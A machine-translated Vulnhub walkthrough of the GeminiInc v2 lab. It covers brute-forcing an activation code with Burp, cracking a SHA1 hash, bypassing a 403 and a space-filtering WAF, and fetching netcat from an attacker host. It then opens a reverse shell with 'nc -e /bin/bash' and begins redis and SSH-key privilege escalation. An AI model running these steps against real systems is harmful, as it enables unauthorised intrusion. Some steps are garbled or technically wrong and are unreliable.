当前位置：网站首页>Vulnhub geminiinc V2

Because we didn't find any useful information for breaking through the boundary on the main page , So in order to collect more information , Catalog blasting

-r Parameter means do not crawl recursively , Only first level directory crawling , Do not crawl the subitems under the existing directory

dir url -r

（1） When we collect information from these sites one by one ,css,img,js If there is no comment to disclose useful information , It doesn't help us much ,

（2） The biggest help to us here is inc, There are some configuration files , But the interview shows blank .

（3） At the beginning of information collection , We see a PHPSESSION, Prove that this site uses php Built

2.php File detection

dirb http://192.168.29.137/ -r -X .php

Access these detected files one by one , information gathering .

5、 ... and 、 information gathering

1.activate.php Activate the interface

2.export.php

This is a file that appeared in the last target , be used for html to pdf Of , We haven't found the entrance here , Temporarily unavailable

3.footer header

This kind of file is in the construction of website development , It's a footer header file , It's of no use to us here .

4.registration.php

Follow the steps , Create an account

5.user.php profile.php

cannot access . I've learned before , If 403 If you refuse access , We can bypass... By changing the host header and so on .

6、 ... and 、registration.php

1. register

Enter the account and user name similar to the last target email An error occurred after the display , Try it again .

2. Try it again

Display already exists , It seems that the data has been in the database , The message above is misleading 、

3. Try to login on the login page

7、 ... and 、 Information collection after login

1.activate

There is a message that we have not activated , Obviously , Activate in the file we found before . Ask for a id And six digit activation code .id We can detect the post login function in profile Medium url It can be seen in 14

8、 ... and 、burp Blasting activation code

1. Grab and join position

Because there are token verification , My understanding is that for every request we make , The server responds to a new token value , Next time we'll take this token To make a request .

2.pitchfork

Harpoon mode , Two dictionaries explode one-on-one

3.payload

（1）paylaod1

（2）paylaod2

①grep extract

Extract back to the bag token

②Recursive grep

③ Threads

Thread changed to 1, The number of failed requests is changed to 0

④ Start the attack

Returned a 302 Status code , It is estimated that the activation is successful

4. Log back in

Discovery has been activated , This interface is a little similar to the target plane we shot last time ,.

Nine 、 Post login information collection

1. There is this one in the source code hash value .

2. verification

by force of contrast , We can know that this is sha1 Algorithm

3.hash-sha1 Decrypt

Website ：md5hashing.net

Ten 、 Sign in

1. Page analysis

It should be an administrator account , There are more functions after login

2. Functional analysis

There are two functions , A general setting , A command executes , But there is no access ,403 了

11、 ... and 、403 by pass Bypass

1. download by pass

2. modify project object

3. modify socope Range

4. modify target

Add the site to scope

2. revisit

Successfully loaded

Twelve 、WAF Command execution

1. perform id

2. perform ls -a

Wrong report , Display illegal characters , After investigation, it is found that no blank space can be entered here

3.tab Key bypass

%09

use burp Change bag grabbing to bag grabbing tab Keyed url After coding, the execution is successful

13、 ... and 、 Upload nc And rebound shell

1. Upload nc

Because the target host does not nc, So upload one to him nc

kali End find nc In the folder . use python Turn on http service

Target end ：

wget http://192.168.29.129/nc -O /tmp/nc

chmod +x somefile and chmod a+x somefile It's the same

chmod +x /tmp/nc

2. rebound shell

（1） Test connection , Whether the upload is successful , Bounce after success shell The operation of

/tmp/nc ip port

（2） perform

/tmp/nc 192.168.29.129 1234 -e /bin/bash

3. Upgrade shell

Here are some rules for filtering command execution

fourteen 、 Raise the right

kernel ,suid file , out of buffer ,sudo Configuration was unsuccessful

1. Check the network status

netstat -ano

2. see redis process

His owner is root, If it has loopholes , We can use redis rebound shell.

ps aux | grep redis

3./etc/redis

Here we find the password

15、 ... and 、 Upload the private key

1. Listen

/tmp/nc -nvlp 4444 > ./authorized_keys

2.kali End generates public and private keys

ssh-keygen

3. Upload

nc ip 4444 < ./id_rsa -w 1

4.ssh Sign in

Get a higher authority , The output connection is stable shell, It is conducive to our future redis Write the public key in the database to realize the right lifting .